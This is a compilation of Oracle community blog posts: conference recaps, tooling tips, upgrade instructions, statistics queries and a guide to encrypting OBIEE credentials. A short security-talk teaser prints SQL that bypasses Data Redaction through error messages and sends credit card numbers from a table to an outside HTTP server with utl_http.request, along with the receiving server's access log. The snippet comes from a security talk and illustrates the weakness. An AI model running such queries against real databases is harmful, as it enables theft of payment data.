First things first: It was a great event!
Many thanks to the DOAG staff for offering and organizing it, great job!
Top-Notch speakers and Oracle Celebrities with so many great presentations that I really felt sorry to be unable to clone myself in order to attend multiple sessions in parallel
Let me mention just a few that I attended:
There was Graham Wood with his talk DB Time-based Oracle Performance Tuning: Theory and Practice
Another very interesting presentation was Kyle Hayley‘s about Instant DB Cloning
One goodie here: Check out clonedb with MOS Note 1210656.1 or this article http://www.oracle-base.com/articles/11g/clonedb-11gr2.php
It went on with Larry Carpenter talking about Best Practices for Data Availability and Disaster Protection
On we went with Julian Dontcheff’s Upgrading to Oracle 12c
I was really pleased to meet him in person for the first time since we have had some contact over social media before – that’s one of the best things about these conferences
One highlight was the option to do upgrade to 12c (not just recompile!) in parallel.
Then came Joel Goodman with his presentation about RAC Global Resource Management Concepts
Mark Scardina then almost convinced me that it may indeed be useful do create Server Pools with his talk Why and How You Should Be Using Policy-Managed Oracle RAC Databases
Especially, you can control the start order and priority of services when servers get scarce (after a crash, e.g.)
My own presentation about Materialized Views & Partition Change Tracking almost filled room 2 and got strong applause, so I consider it a success
Key point is here
Very instructive talk followed by Mike Dietrich about Working with Multitenant Databases in Practice
You can download the slides from his blog. One highlight: In 12c, you have Full Transportable Export/Import which is a combination of Transportable Tablespaces and full export – very cool!
We saw a great presentation also by Kai Yu about Achieving Availability and Scalability with Oracle 12c Flex Clusters
and I was glad to meet him in person there! One key point: Flex Clusters need Flex ASM, but Flex ASM can also be used by Standard Clusters
Markus Michalewicz did a great job with his presentation about RAC 12c Best Practices – if I should recommend only one talk, this would probably be it.
One out of many key points was the recommendation to install Oracle Grid Infrastructure for a Cluster for any deployment; may it be a Single Instance Database or an Oracle RAC Database.
Then I went to Frank Schneede to hear about 12c New Features for Data Warehousing
Very good – as usual – was also Christian Antognini with Query Optimizer 12c New Features
A DOAG highlight was also the Data Guard Expert Panel – felt honored about the invite to join it together with a legend like Larry Carpenter
All in all a great conference! Looking forward to DOAG 2014 already
Mike McKay-Dirden recently wrote to me asking if I would speak at a new event he’s trying to establish called Oracle Midlands. You can read his thoughts about it on the about page. It’s similar to the types of things the Pythian guys do with the local meetups.
The success or failure of this sort of thing is totally down to the level of participation by the attendees, so get signing up if you want to be part of if it! Also, if you come along and chat to Mike, you can help shape future events…
Tim…Oracle Midlands : Event #1 was first posted on November 22, 2013 at 9:50 am.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.
I just uploaded my DOAG 2013 presentation “Best of Oracle Security 2013“.
This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…
SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);
ERROR at line 1:
ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at “ORDSYS.ORDERROR”, line 5
ORA-06512: at “ORDSYS.ORD_DICOM_ADMIN_PRV”, line 1394
ORA-06512: at “ORDSYS.ORD_DICOM_ADMIN_PRV”, line 479
ORA-06512: at “ORDSYS.ORD_DICOM_ADMIN_PRV”, line 8232
ORA-06512: at “ORDSYS.ORD_DICOM”, line 756
ORA-06512: at line 1
select * from credit_card where 1=length(utl_http.request(‘http://192.168.2.102:8080/’||card_id));
==> bypassing the obfuscation because the utl_http.request is located in the where clause
——– output from access.log ————
192.168.2.101 – - [13/Sep/2013:15:19:20 Central Europe Daylight Time] “GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – -
192.168.2.101 – - [13/Sep/2013:15:19:20 Central Europe Daylight Time] “GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – -
——– output from access.log ————
Bit of a corner case this week but I wanted to park this as much for my reference as yours. Need to be able to test a pure XSL template against some sample data? Thats an XSL template that is going to generate HTML, Text or HTML. The Template Viewer app in the BI Publisher Desktop group does not offer that as an option. It does offer XSL-FO proccesing thou.
A few minutes digging around in the java libraries and I came up with a command line solution that is easy to set up and use.
1. Place your sample XML data and the XSL template in a directory
2. Open the lib directory where the TemplateViewer is installed. On my machine that is d:\Oracle\BIPDesktop\TemplateViewer\lib
3. Copy the xmlparserv2.jar file into the directory created in step 1.
4. Use the following command in a DOS/Shell window to process the XSL template against the XML data.
java -cp ./xmlparserv2.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls
The file generated will depend on your XSL. For an Excel output, you would instruct the process to generate fileX.xls in the same folder. You can then test the file with Excel, a browser or a text editor. Now you can test on the desktop until you get it right without the overhead of having to load it to the server each time.
To be completely clear, this approach is for pure XSL templates that are designed to generate text, html or xml. Its not for the XSLFO templates that might be used at runtime to generate PDF, PPT, etc. For those you should use the Template Viewer application, it supports the XSLFO templates but not the pure XSL templates.
If your template still falls into the pure XSL template category. This will be down to you using some BIP functionality in the templates. To get it to work you'll need to add in the Publisher libraries that contain the function e.g. xdo-core.jar, i18nAPI_v3.jar, etc to the classpath argument (-cp.)
So a new command including the required libraries might look like:
java -cp ./xmlparserv2.jar;./xdo-core.jar;./i18nAPI_v3.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls
You will need to either move the libraries to the local directory, my assumption above or include the full path to them. More info here on setting the -cp attribute.
There are two steps you have to take to "save big". First, become a full member of ODTUG for $99 and enjoy all of the benefits, including access to a members-only presentations library, throughout the year. Next, register for Kscope14 and you are eligible for the members-only price of $1500 for a savings of $150. While you are registering, simply use the code AOLAP to get an additional $100 discount!
My company, Applied OLAP, is one of top-tier Platinum Sponsors of Kscope14 and I will be there. I hope to see you at the conference and, if you were able to save some money by using our exclusive AOLAP code, be sure to stop our booth, say hello, and learn how the Dodeca Spreadsheet Management System can help your company reduce spreadsheet risk, increase spreadsheet accuracy, and reduce costs.
Jonathan Lewis pointed out this interesting article on conversions at SQLfail: When is SYSDATE != SYSDATE?
Another angle on relational systems vs. hierarchical/object oriented is this article from Sarah Mei: Why You Should Never Use MongoDB.
At Database Journal: Compression and Advanced Compression in Oracle 11.2.
Making a test case can be a challenge, and usually comes along just when everyone is breathing down your neck. Good posting on Oracle 11g SQL Test Case Builder(原创)from CzmMiao的博客生活.
The Hotsos Symposium 2014 will be held March 2-6, 2014 in Irving, TX. This is always one of the best, if not the best performance conferences for Oracle professionals.
Oracle Data Integrator 12c release : Part 2, from RittmanMead.
SOA Proactive Support brings us: Scripted SOA Diagnostic Dumps for PS6 (18.104.22.168).
From Pythian: How to Download Oracle Software Using WGET or CURL.
Oracle Endeca Information Discovery 3.1 and Self- Service Data Mashup capability, from RittmanMead.
Data Warehousing and the Oracle Exadata System – Intel Chip Chat – Episode 279, from Connected Social Media.
Spacewalk 2.0 provided to manage Oracle Linux systems, from Wim Coekaerts Blog.
From Ronald Bradford, the MySQL Expert blog: What SQL is running MySQL.
Coming up on 20-NOV-2013: Oracle 7th Annual Federal Forum.
A recent study showed that occasional distractions in the course of the work day are actually good for staying sharp and focused when you are working. Well here is the mother lode of distractions, a site consisting totally of those silly but engaging lists you see at the bottom of various website pages.
We are now accepting abstracts for speaker proposals GLOC 2014 abstracts
It is the standard speaking gig free conference attendance for speakers ... one hour time slot.
Keynotes tuesday by Tom Kyte and Steven Feuerstein ... workshops monday by Carlos Sierra and Scott Spendolini ( maybe a 3rd or 4th workshop ? ).
This year we are working on a stronger Apps track ... expecting the usual high quality sessions for DBA / Developer / DW&BI tracks.
The call for abstracts will be open for a long time ... just first notification that it is now available.
I hope to see you at GLOC 2014!
Thanks John Hurley aka @GrumpyOldDBA aka NEOOUG President
Yesterday I was trying to figure out if any queries on a particular production database were using subpartition statistics on a certain table. We are having trouble getting the statistics gathering job to finish gathering stats on all the subpartitions of this table in the window of time we have given the stats job. My thought was that we may not even need stats on the subpartitions, so I wanted to find queries that would prove me wrong.
My understanding of Oracle optimizer statistics is that there are three levels – table or global, partition, and subpartition. The table I am working on is partitioned by range and subpartitioned by list. So, I think that the levels are used in these conditions:
- Global or table: Range that crosses partition boundaries
- Partition: Range is within one partition but specifies more than one list value
- Subpartition: Range is within one partition and specifies one list value
In the table I was working on it was partitioned by week and subpartitioned by location so a query that specified a particular week and an individual location should use the subpartition stats.
So, I did some experimentation and came up with this query:
select p.PLAN_HASH_VALUE, min(p.sql_id), count(*) from DBA_HIST_SQL_PLAN p where p.OBJECT_OWNER='MYOWNER' and p.OBJECT_NAME='MYTABLE' and p.partition_start=p.partition_stop and substr(p.partition_start,1,1) in ('0','1','2','3','4','5','6','7','8','9') and p.sql_id in (select sql_id from DBA_HIST_SQLSTAT) group by p.PLAN_HASH_VALUE order by p.PLAN_HASH_VALUE;
I’ve replaced the real owner and table name with MYOWNER and MYTABLE. The point of this query is to find the distinct plans that use subpartition statistics and one sql query as an example of each plan. There were multiple queries with the same plans but slightly different constants in their where clause so I just needed one example of each.
In my experimentation I found that plans that had the same numbers for the partition stop and start were the plans that used subpartition stats. I’m not sure about the plans that don’t have numbers in their partition start and stop columns.
Here is what the output looks like:
PLAN_HASH_VALUE MIN(P.SQL_ID) COUNT(*) --------------- ------------- ---------- 151462653 fugdxj00cnwxt 1 488358452 21kr79rst8663 2 634063666 5fp4rnzgw6gvc 1 1266515004 98zbx8gw95zf8 2 1397966543 37gaxy58sr1np 2 1468891601 5fp4rnzgw6gvc 1 1681407819 001aysuwx1ba4 230 1736890182 64tmnnap05m6b 2 2242394890 2tp8jx3un534j 1 2243586448 9fcd80ms6h7j4 2 2418902214 64tmnnap05m6b 1 2464907982 5fp4rnzgw6gvc 1 3840767159 05u7fy79g0jgr 143 4097240051 5mjgz2v8a3p6h 1
This is the output on our real system. Once I got this list I built a script to dump out all of these plans and the one sql_id for each:
select * from table(DBMS_XPLAN.DISPLAY_AWR('fugdxj00cnwxt',151462653,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('21kr79rst8663',488358452,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('5fp4rnzgw6gvc',634063666,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('98zbx8gw95zf8',1266515004,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('37gaxy58sr1np',1397966543,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('5fp4rnzgw6gvc',1468891601,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('001aysuwx1ba4',1681407819,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('64tmnnap05m6b',1736890182,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('2tp8jx3un534j',2242394890,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('9fcd80ms6h7j4',2243586448,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('64tmnnap05m6b',2418902214,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('5fp4rnzgw6gvc',2464907982,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('05u7fy79g0jgr',3840767159,NULL,'ALL')); select * from table(DBMS_XPLAN.DISPLAY_AWR('5mjgz2v8a3p6h',4097240051,NULL,'ALL'));
Here is a edited down output of just the relevant part of the first plan:
Plan hash value: 151462653 ------------------------------------------------------------------ | Id | Operation | Name | Pstart| Pstop | ------------------------------------------------------------------ | 31 | TABLE ACCESS STORAGE FULL | MYTABLE | 41017 | 41017 | ------------------------------------------------------------------
This query had conditions in its where clause like this:
LIST_COLUMN = 1234 AND (RANGE_COLUMN BETWEEN TO_DATE('20130609000000','YYYYMMDDHH24MISS') AND TO_DATE('20130615000000','YYYYMMDDHH24MISS'))
I’ve renamed the real column for the list subpartioning to LIST_COLUMN and renamed the real column for the range partitioning to RANGE_COLUMN.
One interesting thing I realized was that since we are on an Exadata system and there are no visible indexes on the subpartitioned table the subpartition stats aren’t being used to determine whether the query will use an index scan or full scan. But, they are used in these queries to determine the number of rows the full scan will return so that could impact the plan.
I’m thinking of using table preferences to just turn off the subpartition stats gathering using a call like this:
begin DBMS_STATS.SET_TABLE_PREFS ('MYOWNER','MYTABLE', pname=>'GRANULARITY', pvalue=>'GLOBAL AND PARTITION'); end; /
As it is the table has 40,000 subpartitions and the daily stats job isn’t finishing anyway so regardless of the queries that use the subpartition stats I think we should set the preference. Maybe just leave dynamic sampling to handle the queries that actually use the one subpartition’s stats or have some application job gather stats on the one subpartition when it is initially loaded. It is a work in progress, but I thought I would share what I’ve been doing.
As of now this already seems to be not the most current version, JasperReports has already moved on to 5.5.0. But since I have already created the 5.2.0 package a while ago, I might just post the instructions here. The 5.5.0 version will follow.
Here you go ...
This is an updated version of the original instructions found here: http://daust.blogspot.de/2013/01/upgrading-jasperreports-libraries-to-501.html
Step 1: Download the libary files for 5.2.0
You can download the files here:
Step 2: Shutdown the Apache Tomcat J2EE server Step 3: Remove the existing JasperReportsLibraries from your existing installation
Typically, after you have installed your previous version of the JasperReportsIntegration toolkit on your Apache Tomcat J2EE server, the files will be located in the directory $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib, for example version 4.7.0 of JasperReports, where $CATALINA_HOME represents the path to your installation of Tomcat.
Then you would have to remove these libraries first. In this directory you should find two files for removal: _jasper-reports-delete-libs-4.7.0.sh and _jasper-reports-delete-libs-4.7.0.cmd, for *nix or Windows respectively. For *nix systems you would have to make it executable, though, e.g.: chmod u+x _jasper-reports-delete-libs-4.7.0.sh . Then you can call it and it will remove all files for version 4.7.0. But it will NOT remove the file for the JasperReportsIntegration and all other libraries which YOU might have placed there deliberately.
You can always find the required removal scripts here: http://www.opal-consulting.de/downloads/free_tools/JasperReportsLibraries/ .
Whenever I release another package, the removal scripts for that package will be shipped as well.
Step 4: Install the new 5.2.0 libraries
Now you can just copy the new libraries from JasperReportsLibraries-5.2.0.zip into $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib.
Step 5: Start the Apache Tomcat J2EE server again
Now you system should be upgraded to the most current JasperReports 5.2.0 !
Just drop me a note when you need updated libraries for a later JasperReports version, etc. I have scripts in place to create a new package of the libraries.
Here you can find the notes from my upgrade (4.5.0 => 4.8.0) on Linux to illustrate the process, I hope it makes sense:
** download the libraries from:
** to /home/jasper/JasperReportsLibraries
** unzip them
unzip JasperReportsLibraries-4.8.0.zip -d JasperReportsLibraries-4.8.0
** stop tomcat server
** remove libraries of current jasper reports release
chmod +x _jasper-reports-delete-libs-4.5.0.sh
** copy libraries of the new release to the WEB-INF/lib directory
cp /home/jasper/JasperReportsLibraries/JasperReportsLibraries-4.8.0/* /home/jasper/tomcat/webapps/JasperReportsIntegration/WEB-INF/lib
** restart tomcat
Cloud computing is allowing big data enterprises to transform how they manage stores of information. Rather than relying on legacy solutions, such as on-premises datacenters, to house digital assets, businesses are now capable of purchasing scalable memory. With this strategy, it's easier for IT managers to upgrade storage swiftly.
More options means more solutions
In addition to these strategies, InformationWeek reported that the recent surge of cloud services has provided enterprises with new options for crafting unique and efficient methods of governing their data. For example, information can be partitioned into different sections of the storage space according to how often it is accessed.
As the cloud enables employees to sync with data at any time, as long as they are utilizing an Internet-optimized device, the introduction of a cloud-based infrastructure could potentially make certain layers of information more heavily trafficked. According to the source, however, enterprises can now leverage flash storage arrays, which will provide organizations with an alternative storage functionality to handle increases in data access. All other information that typically has a much lower traffic rate can still be housed traditionally.
Hybrid cloud options, such as the example listed above, enable IT managers to retain more control over their sensitive data. Converged cloud infrastructures, for instance, allow decision-makers to leverage more applications that can be deployed across digital architectures. These strategies, such as database administration services, provide organizations with fully-operational cloud solutions that can be configured to support the overall needs of the company. Remote DBA services also make categorizing data simpler and faster, which allow tech teams to focus their energies on maintaining the daily operations of the company.
Transforming the business landscape
The Guardian noted that cloud computing has become more than a trend in the enterprise landscape. More companies are integrating a cloud option into their existing infrastructures, making it easier for them to augment the speed and agility of their services. Additionally, as the cloud advances, more options are becoming available for IT managers that will allow companies to maintain a stronger edge over their competition.
Decision-makers should be considering how the cloud can transform their operations without costing more in legacy upgrades.
RDX offers a full suite of cloud migration and administrative services that can be tailored to meet any customer's needs. To learn more about our full suite of cloud migration and support services, please visit our Cloud DBA Service page or contact us.
If you are using a desktop PC running windows, but spend your life connecting UNIX and Linux servers, like most DBAs and sys admins, you really need this in your life! It’s so much better than anything I’ve ever used before. Even those really expensive desktop X emulators (you know who you are)! What’s more, it’s a self contained .exe, so no need for installation. Just unzip and go. Perfect on a memory stick!
Tim…MobaXterm 6.6 was first posted on November 21, 2013 at 9:54 am.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.
I tried executing top and it was also ending up with segmentation fault some of the time. At the times it would start, it would give a flashing
I checked the server memory and it had 73 GB free memory.
Eventually I opened up the adpreclone.pl script in vi to study what it was doing. At one place, I noticed that it was looking for the environment variable $USER. When I checked, on the server, echo $USER, did not return anything. I checked on other working servers and echo $USER returned the unix applmgr username.
So I manually set
perl adpreclone.pl appsTier
Entered apps password, and it worked fine.
This was a new server. Seems like unix team missed something during this build. I tried looking up /etc/profile, but wasn't able to find out why the environment variable USER was not set. I'll update this post, when I discover the reason.
by Steven Feuerstein, 2013
I should not be here.
I should not be.
Too many humans
devouring the world.
I would leave
to save a single tree
or to ensure
a fern leaf unfurled.
But I'll stay, instead,
and switch allegiance
from a genocidal species
to my planet, my home:
my home of surpassing beauty.
If I stay, instead,
and save a single tree
and help tree ferns
unfurl their leaves,
perhaps I could at least
Out of these I would recommend Console (From Browser, Batch), EMCLI (command line, Batch) and PULL (command line) methods.
Refer: Console Method (From Browser, Batch),http://docs.oracle.com/cd/E24628_01/install.121/e22624/install_agent.htm#CACJEFJI
EMCLI (command line, Batch) (New from 22.214.171.124)http://www.oracle.com/technetwork/oem/install-upgrade/em-12103-agent-deployment-1967206.pdf
All other methods:http://docs.oracle.com/cd/E24628_01/install.121/e24089/install_agent_usng_rsp.htm
You can contribute your EM 12c contents on the above site
A Guest Post by Esteban Kolsky, industry influencer (pictured left)The great experiment continues. We are exploring and establishing the right questions to ask when undertaking a customer experience initiative.
So far we have discussed who owns the customer experience and the cultural (people) aspects of deploying a customer experience initiative. In this third post I’m going to talk about processes. (This sponsored research investigation into customer experience is brought to you via my good friends at Oracle.)
The format of this exercise is to pose four questions around the topics of people, process, and technology and explore the implications of each question. The questions, and more importantly your answers, should give you sufficient information to launch your customer experience initiative—or at least to build a framework towards it.
First, are your processes well documented?
I have very interesting discussions with clients when I ask this question. Of course, the initial answer is always yes—followed by something like “we spent x amount of time doing a BPO project and it is all documented.” My follow up question is always—are your processes updated? Most organizations fail to implement some sort of technology or workflow that will allow them to continuously update the documentation (or in some cases, even find the documentation after the initial project). Any minor change—a compliance requirement, a change in organization hierarchies, a departure of a staff member in some cases—can change the process. Even if the changes are slight, they can accumulate over time and translate into large changes.
Action Items: 1) Ensure that documentation exists and can be easily found, 2) Keep the documentation updated, and 3) Make sure the process changes you make can be introduced into the existing documentation.
Second, do you have flexible processes?
Most everyone believes their processes are flexible. After all, nearly all processes have been modified numerous times since their inception—and that clearly denotes their flexibility—right? Yes, to a certain extent. However, a large number of processes are inflexible because of their dependency with a specific person, channel, location, or even a system or solution (called external dependencies). This is not about dependencies between processes (I cover that below). This is about processes that have external dependencies and no inter-process dependencies. In reality, not having interaction with other processes is what makes a process less flexible, because some of the work and information is likely (or at least possibly) going to be repeated across different processes. Therefore, having rigid processes that cannot be replaced or integrated with new processes can create major problems.
Action Item: First, understand the dependencies between processes and external factors, such as people, solutions, and technologies—anything that is not a process. Second, find a way to replace the dependency with one that is more sensible. Then the process can be flexible enough to be extended or modified.
Third, do you understand the dependencies between processes?
There is no process that exists by itself, independent of anything else. As a matter of fact, the entire concept of creating and building processes exists because of their interdependencies—to ensure that the actions executed by those processes are leveraged in one part of the organization and then generate a result in another part of the organization. The question to ask is: are the dependencies between processes well documented so if (more likely, when) you make a change to a process, you know what other processes are affected and can quickly implement necessary changes?
Action Item: Ensure the interdependencies between projects are documented and that the documentation processes can accommodate new and different relationships between them.
Fourth, do you have processes for changing processes?
This might seem like a redundant question to ask; however, it is actually one of the most important aspects of changing processes—and all due to a single reason. When you change a process once, you will need to change it again. The benefits from a single change compound over time as more changes are made (from single adjustments to entire end-to-end reengineering). This is why you need to make sure you have a process in place to make the changes: nothing is once-and-done when it comes to processes. Furthermore, changes done for the purpose of customer experience are always going to have a shorter life than any other change, mainly because the customers’ needs and wants will change constantly. Other variables, such as channels, resolutions, or compliance, also will change, and there is going to be a need to revamp them often.
Action Item: If you don’t have a process for changing processes, that should be your first stop in the adoption of customer experience.
These are the basic questions you will need to ask yourself to undertake the process changes necessary to adopt a customer experience initiative. Of course, the project becomes more complex when you weave these answers with your answers from the previous post (changes in culture to deliver better customer experiences). And that needs to be done before you undertake the final set of questions (coming in the next post) on technology use for customer experience.
Until then, I would love to hear from you. Are these questions representative of the changes in process that you have experienced when undertaking a customer experience initiative? Is your experience different? What am I missing?
Note: You can respond via my blog or scroll down and post a comment.
Busy times lately here at the ‘Lab. We’ve grown from a small band of three to six in the past six weeks.
Joining our happy little crew are Osvaldo, whom we were lucky to find on our adventure to Mexico, Raymond, a friend of Anthony’s from Taleo, and Tony, whom I’ve known for many years.
Our ‘Lab veterans have been road warriors lately. Earlier this week, Anthony spoke at the OTN China Tour in Beijing, showing off the Glass concept app he built, as well as the Leap Motion-controlled robotic arms he and Noel hacked together right before OpenWorld.
Noel was in Mexico, and soon, he’ll be heading to UKOUG Tech 13 to speak. His session is called “Oracle Fusion & Cloud Applications: A Platform for Building New User Experiences” at the happy hour friendly time of 17:45 on Tuesday, December 3.
If you’re attending Tech 13, drop by and say hi, or just look for Noel. He’ll be hanging around the show all week.
Anyway, I have a backlog of posts, just not a backlog of time to push them. Stay tuned.Possibly Related Posts:
- Hot Oracle Applications User Experience News
- See You at Kscope 13
- OpenWorld Developer Challenges
- Messing around with Glass and Fusion CRM for Kscope 13
- NWOUG 2012 Conference
We all love a good commandline utility. It gives us that warm feeling of control and puts hairs on our chests. Either that, or it means we can script the heck out of a system, automate many processes, and concentrate on more important matters.
However, some of the OBIEE commandline utilities can’t be used in Production environments at many sites because they need the credentials for OBIEE stored in a plain-text file. Passwords in plain-text are bad, mmmm’kay?
Two of the utilities in particular that it is a shame that can’t be scripted up and deployed in Production because of this limitation are the Presentation Services Catalog Manager, and the Presentation Services Replication Agent. Both these perform very useful purposes, and what I want to share here is a way of invoking them more securely.Caveat
IANAC : I Am Not A Cryptographer! Nor am I a trained security professional. Always consult a security expert for the final word on security matters.
The rationale behind developing the method described below is that some some sites will have a “No Plaintext Passwords” policy which flatout prevents the use of these OBIEE utilities. However, at the same sites the use of SSH keys to enable one server to connect to another automatically is permitted. On that basis, the key-based encryption for the OBIEE credentials may therefore be considered an acceptable risk. As per Culp’s 9th law of security administration, it’s all about striking the balance between enabling functionality and mitigating risk.
The method described below I believe is a bit more secure that plaintext credentials, but it is not totally secure. It uses key based encryption to secure the previously-plaintext credentials that the OBI utility requires. This is one step better than plaintext alone, but is still not perfect. If an attacker gained access to the machine they could still decrypt the file, because the key is held on the machine without a passphrase to protect it. The risk here is that we are using security by obscurity (because the OBIEE credentials are in an encrypted file it appears secure, even though the key is held locally), and like the emperor’s new clothes, if someone takes the time to look closely enough there is still a security vulnerability.
My final point on this caveat is that you should always bear in mind that if an attacker gains access to your OBIEE machine then they will almost certainly be able to do whatever they want regardless, including decrypting the weblogic superuser credentials or reseting it to a password of their own choosing.Overview
Two new shiny tools I’ve acquired recently and am going to put to use here are GnuPG (
mkfifo. GPG provides key-based encryption and decryption and is available by default on common Linux distributions including Oracle Linux.
mkfifo is also commonly available and is a utility that creates named pipes, enabling two unreleated processes to communicate. For a detailed description and advanced usage of named pipes, see here
This is a one-time set up activity. We create a key in
gpg, and then encrypt the plain text credentials file using it.
The first step is to create a gpg key, using
gpg --gen-key. You need to specify a “Real name” to associate with the key, I just used “obiee”. Make sure you don’t specify a passphrase (otherwise you’ll be back in the position of passing plain text credentials around when you use this script).
$ gpg --gen-key gpg (GnuPG) 1.4.5; Copyright (C) 2006 Free Software Foundation, Inc. This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. See the file COPYING for details. Please select what kind of key you want: (1) DSA and Elgamal (default) (2) DSA (sign only) (5) RSA (sign only) Your selection? DSA keypair will have 1024 bits. ELG-E keys may be between 1024 and 4096 bits long. What keysize do you want? (2048) 2048 [...] Real name: obiee Email address: Comment: [...] You don't want a passphrase - this is probably a *bad* idea! I will do it anyway. You can change your passphrase at any time, using this program with the option "--edit-key". [...] gpg: key 94DF4ABA marked as ultimately trusted public and secret key created and signed.
Once this is done, you can encrypt the credentials file you need for the utility. For example, the Catalog Manager credentials file has the format:
To encrypt it use
gpg --recipient obiee --output saw_creds.gpg --encrypt saw_creds.txt
Now remove the plaintext password file
Using the secure credentials file
Once we have our encrypted credentials file we need a way of using it with the utility it is intended for. The main thing we’re doing is making sure we don’t expose the plaintext contents. We do this using the named pipes method:
In this example I am going to show how to use the secure credentials file with
runcat.sh, the Catalog Manager utility, to purge the Presentation Services cache. However it should work absolutely fine with any utility that expects credentials passed to it in a file (or stdin).
There is a three step process:
Create a named pipe with
mkfifo. This appears on a disk listing with the
pbit to indicate that it is a pipe. Access to it can be controlled by the same
chmodprocess as a regular file. With a pipe, a process can request to consume from it, and anything that is passed to it by another process will go straight to the consuming process, in a FIFO fashion. What we’re doing through the use of a named pipe is ensuring that the plain text credentials are not visible in a plain text file on the disk.
Invoke the OBIEE utility that we want to run. Where it expects the plaintext credentials file, we pass it the named pipe. The important bit here is that the utility will wait until it receives the input from the named pipe – so we call the utility with an ampersand so that it returns control whilst still running in the background
gpgto decrypt the credentials file, and pass the decrypted contents to the named pipe. The OBIEE utility is already running and listening on the named pipe, so will receive (and remove from the pipe) the credentials as soon as they are passed from
The script that will do this is as follows:
# Change folder to where we're invoking the utility from cd $FMW_HOME/instances/instance1/bifoundation/OracleBIPresentationServicesComponent/coreapplication_obips1/catalogmanager # Create a named pipe mkfifo cred_pipe # Let's make sure only we can access it chmod 600 cred_pipe # Invoke Catalog Manager. Because we're using a named pipe, it's actually going to sit and wait until it gets input on the pipe, so we need to put the ampersand in there so that it returns control to the script ./runcat.sh -cmd clearQueryCache -online http://localhost:9704/analytics/saw.dll -credentials cred_pipe & # Decrypt the credentials and send them to the named pipe gpg --quiet --recipient obiee --decrypt saw_creds.gpg > cred_pipe # Remove the named pipe rm cred_pipe
Depending on the utility that you are invoking, you may need to customise this script. For example, if the utility reads the credentials file multiple times then using the named pipes method it will fail after the first read. Your option would be to read the credentials into the pipe multiple times (possibly a bit hacky), or land the plaintext credentials to disk and delete them after the utility complete (could be less secure if the delete doesn’t get invoked)Using a secure credentials file for command line arguments
Whilst the sticking point that triggered this article was around utilities requiring whole files with credentials in, it is also common to see command line utilities that want a password passed as an argument to them. For example, nqcmd :
nqcmd -d AnalyticsWeb -u weblogic -p Password01 -s myscript.lsql
Let’s assume we’ve created an encrypted file containing “Password01” (using the
gpg --encrypt method shown above) and saved it as password.gpg.
To invoke the utility and pass across the decrypted password, there’s no need for named pipes. Instead we can just use a normal (“unnamed”) pipe to send the output straight from gpg to the target utility (nqcmd in this example), via xargs:
gpg --batch --quiet --recipient obiee --decrypt ~/password.gpg | xargs -I GPGOUT nqcmd -d AnalyticsWeb -u weblogic -p GPGOUT -s input.lsql
xargs has a
--interactive option that makes it a lot easier when developing piped commands such as the above
Because there is no passphrase on the gpg key, a user who obtained access to the server would still be able to decrypt the credentials file. In many ways this is the same situation that would arise if a server was configured to use ssh-key authentication to carry out tasks or transfer files on another server.Uses
Here are some of the utilities that the above now enables us to run more securely:
- nqcmd is a mainstay of my OBIEE toolkit, being useful for performance testing, regression testing, aggregate building, and more. Using the method above, it’s now easy to avoid storing a plaintext password in a script that calls it.
- Keeping the Presentation Catalog in sync on an OBIEE warm standby server, using Presentation Services Replication
- Purging the Presentation Services Cache from the command line (with Catalog Manager, per the above example)
- SampleApp comes with four excellent utilities that Oracle have provided, however all but one by default requires plaintext credentials. If you’ve not looked at the utilities closely yet, you should! You can see them in action in SampleApp itself, or get an idea of what they do looking at the SampleApp User Guide pages 14–17 or watching the YouTube video.